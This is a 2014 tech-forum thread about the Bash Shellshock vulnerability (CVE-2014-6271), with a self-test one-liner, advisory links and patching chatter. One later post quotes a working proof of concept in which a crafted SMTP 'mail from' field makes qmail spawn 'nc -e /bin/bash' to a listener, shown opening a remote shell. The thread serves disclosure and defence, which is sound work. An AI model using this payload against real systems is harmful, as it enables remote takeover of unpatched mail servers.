Geekzone: technology news, blogs, forums
Guest
Welcome Guest.
You haven't logged in yet. If you don't have an account you can register now.


alexx

700 posts

Ultimate Geek


#152414 25-Sep-2014 16:56
Send private message

By now you've probably all heard about CVE-2014-6271:

Overview

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

http://seclists.org/oss-sec/2014/q3/650 
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

This affects bash in linux distributions and bash in OS X also appears to be vulnerable.

Test with the following in the shell...

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


If you get the following output, then the system is vulnerable.

vulnerable
this is a test



More info:
http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/

But things might be worse than it appears, as the latest patches do not appear to cover all cases of string processing in bash, so there might be additional exploits to come.
https://news.ycombinator.com/item?id=8365158




#include <standard.disclaimer>


Create new topic
alexx

700 posts

Ultimate Geek


  #1137644 25-Sep-2014 17:02
Send private message

For some reason my formatting is messed up. (fixed).




#include <standard.disclaimer>


freitasm
BDFL - Memuneh
68899 posts

Uber Geek

Administrator
Trusted
Geekzone
Lifetime subscriber

  #1137754 25-Sep-2014 19:22
Send private message

Here is a quick overview of why this is so bad. And think of the number of connected systems that won't have updates...






 

 

These links are referral codes

 

Geekzone broadband switch | Eletcricity comparison and switch | Hatch investment (NZ$ 10 bonus if NZ$100 deposited within 30 days) | Sharesies | Mighty Ape | Backblaze | Coinbase | TheMarket | My technology disclosure


 
 
 
 


hio77
'That VDSL Cat'
12626 posts

Uber Geek

Trusted
Subscriber

  #1137780 25-Sep-2014 19:57
Send private message

hm. didnt hear about this till seeing the post..

i see what im going to be doing over the next few days....





#include <std_disclaimer>

 

Any comments made are personal opinion and do not reflect directly on the position my current or past employers may have.

 


Inphinity
2578 posts

Uber Geek


  #1137783 25-Sep-2014 20:09
Send private message

Spent a chunk of the day patching for it, woohoo.

johnr
19282 posts

Uber Geek
Inactive user


  #1137787 25-Sep-2014 20:21
Send private message

Dam not good :(

freitasm
BDFL - Memuneh
68899 posts

Uber Geek

Administrator
Trusted
Geekzone
Lifetime subscriber

  #1138245 26-Sep-2014 13:51
Send private message




 

 

These links are referral codes

 

Geekzone broadband switch | Eletcricity comparison and switch | Hatch investment (NZ$ 10 bonus if NZ$100 deposited within 30 days) | Sharesies | Mighty Ape | Backblaze | Coinbase | TheMarket | My technology disclosure


gzt

gzt
11685 posts

Uber Geek

Lifetime subscriber

  #1138283 26-Sep-2014 14:46
Send private message

Imo redhat's security summary and related blog post provide the best clarity on the issue. Clearly it needs to be fixed but not every system will be vulnerable in practice. Depends on exposed surfaces.

 
 
 
 


alexx

700 posts

Ultimate Geek


  #1142857 27-Sep-2014 22:54
Send private message

gzt: Imo redhat's security summary and related blog post provide the best clarity on the issue. Clearly it needs to be fixed but not every system will be vulnerable in practice. Depends on exposed surfaces.


The Red Hat summary is one of the better ones, but this is another good one that tracks the different issues and includes a website tester.
https://shellshocker.net/

Please note the warning: Do not test against websites that you do not have permission to test against.




#include <standard.disclaimer>


insane
2416 posts

Uber Geek

Trusted
Subscriber

  #1142858 27-Sep-2014 23:06
Send private message

I'm amazed this hasn't had as much media attention as Heartbleed, I mean this one is a real rip-snorter of a bug.

Dratsab
3598 posts

Uber Geek

Trusted
Lifetime subscriber

  #1142873 28-Sep-2014 07:33
Send private message

insane: I'm amazed this hasn't had as much media attention as Heartbleed, I mean this one is a real rip-snorter of a bug.

Two reasons:
1. It's nix based so the media doesn't have a clue how many and what type of systems could be affected.
2. OS X remains well within the RDF.

wasabi2k
2092 posts

Uber Geek


  #1142882 28-Sep-2014 09:27
Send private message

Yeah they screwed up reporting heartbleed - I shudder to think how they would report on this.

We've tackled it at the edge with checkpoint IPS and Netscaler responder policies.

MackinNZ
434 posts

Ultimate Geek

Subscriber

  #1142919 28-Sep-2014 11:48
Send private message

QNAP have now issued an update to firmware 4.1.1 (build 0927) to address this vulnerability.

Release notes:

 

2014-09-27

 

4.1.1 build 0927

 

 

[QTS 4.1.1 Build 0927]

[Bug Fixes]
 - Fixed the Shellshock security vulnerability that could allow attackers to gain remote control over the system (CVE-2014-6271).

 


freitasm
BDFL - Memuneh
68899 posts

Uber Geek

Administrator
Trusted
Geekzone
Lifetime subscriber

  #1142986 28-Sep-2014 14:18
Send private message

And if you think ONLY web servers are vulnerable... Think again: qmail is a vector for CVE-2014-6271 (bash "shellshock").


As has already been said, upgrade your bash now!

The preconditions for this attack to work are:

1) "Shellshock"-vulnerable bash
2) /bin/sh symlinked to bash
3) Email delivery via qmail to a valid user with a .qmail file containing
ANY program delivery (the actual program being delivered to is irrelevant)

Example:

======

(terminal 0)

$ nc -l -p 7777

(terminal 1)

$ pwd
/home/kgeorge
$ cat .qmail
|/bin/cat
$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 mail.example.com ESMTP
ehlo me
250-mail.example.com
250-PIPELINING
250 8BITMIME
mail from:<() { :; }; nc -e /bin/bash localhost 7777>
250 ok
rcpt to:<kgeorge [at] example>
250 ok
data
354 go ahead
Subject: Vuln

.
250 ok 1411674782 qp 4151

(terminal 0)

$ nc -l -p 7777
ls
mail
whoami
kgeorge





 

 

These links are referral codes

 

Geekzone broadband switch | Eletcricity comparison and switch | Hatch investment (NZ$ 10 bonus if NZ$100 deposited within 30 days) | Sharesies | Mighty Ape | Backblaze | Coinbase | TheMarket | My technology disclosure


Create new topic





News »

Vodafone enables 5G roaming - for when international travel comes
Posted 30-Oct-2020 15:03


Spark awards funding to Kiwi businesses in 5G funding initiative
Posted 30-Oct-2020 14:58


Huawei launches IdeaHub Pro in New Zealand
Posted 27-Oct-2020 16:41


Southland-based IT specialist providing virtual services worldwide
Posted 27-Oct-2020 15:55


NASA discovers water on sunlit surface of Moon
Posted 27-Oct-2020 08:30


Huawei introduces new features to Petal Search, Maps and Docs
Posted 26-Oct-2020 18:05


Nokia selected by NASA to build first ever cellular network on the Moon
Posted 21-Oct-2020 08:34


Nanoleaf enhances lighting line with launch of Triangles and Mini Triangles
Posted 17-Oct-2020 20:18


Synology unveils DS16211+
Posted 17-Oct-2020 20:12


Ingram Micro introduces FootfallCam to New Zealand channel
Posted 17-Oct-2020 20:06


Dropbox adopts Virtual First working policy
Posted 17-Oct-2020 19:47


OPPO announces Reno4 Series 5G line-up in NZ
Posted 16-Oct-2020 08:52


Microsoft Highway to a Hundred expands to Asia Pacific
Posted 14-Oct-2020 09:34


Spark turns on 5G in Auckland
Posted 14-Oct-2020 09:29


AMD Launches AMD Ryzen 5000 Series Desktop Processors
Posted 9-Oct-2020 10:13









Geekzone Live »

Try automatic live updates from Geekzone directly in your browser, without refreshing the page, with Geekzone Live now.


Support Geekzone »

Our community of supporters help make Geekzone possible. Click the button below to join them.

Support Geezone on PressPatron



Are you subscribed to our RSS feed? You can download the latest headlines and summaries from our stories directly to your computer or smartphone by using a feed reader.

Alternatively, you can receive a daily email with Geekzone updates.